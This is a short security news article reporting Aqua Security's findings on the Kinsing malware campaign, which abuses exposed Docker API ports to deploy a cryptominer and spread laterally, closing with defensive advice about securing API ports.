Home Cyber Attack Kinsing Malware Actively Targeting Docker Servers With Exposed API Ports

Kinsing Malware Actively Targeting Docker Servers With Exposed API Ports

by Abeerah Hashim
Symbiote Linux Malware

Researchers have found a malware operation in the wild targeting docker servers. Dubbed Kinsing, the malware is actively targeting Docker servers with exposed API ports.

Kinsing Malware Targeting Docker Servers

Reportedly, the security team from Aqua Security, have found an active malware campaign targeting Docker servers. As elaborated in their blog post, the malware dubbed Kinsing is targeting Docker servers with exposed APIs in the wild. This allows the attackers to install cryptominers and exploit the infected servers to spread the infection.

As stated by the researchers,

The attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing malicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts.

While the detailed technical analysis of the attack is available in the researchers’ post, here is a brief.

The attack begins when the attackers detect an unprotected open Docker API port. They then instantiate an Ubuntu container with an entry point to download a shell script d.sh from either of their three IP addresses. This shell script performs various activities facilitating the execution of malware. The same also downloads and runs the Kinsing malware.

This malware has several C&C servers each dedicated to separate operations. Though this malware aims to deploy cryptominer (kdevtmpfsi), it also performs other activities such as lateral movement to target other systems.

Infection Campaign Going Around For Months

According to Aqua, Kinsing malware attackers have been actively going on for months targeting misconfigured open Docker Daemon API ports. Almost every day, the researchers could witness thousands of such attempts.

Researchers advise companies to ensure the security of all their API ports whilst reviewing their Docker instances. Companies can protect the exposed admin endpoints behind firewalls or VPNs and should disable them when not in use.

Let us know your thoughts in the comments.

You may also like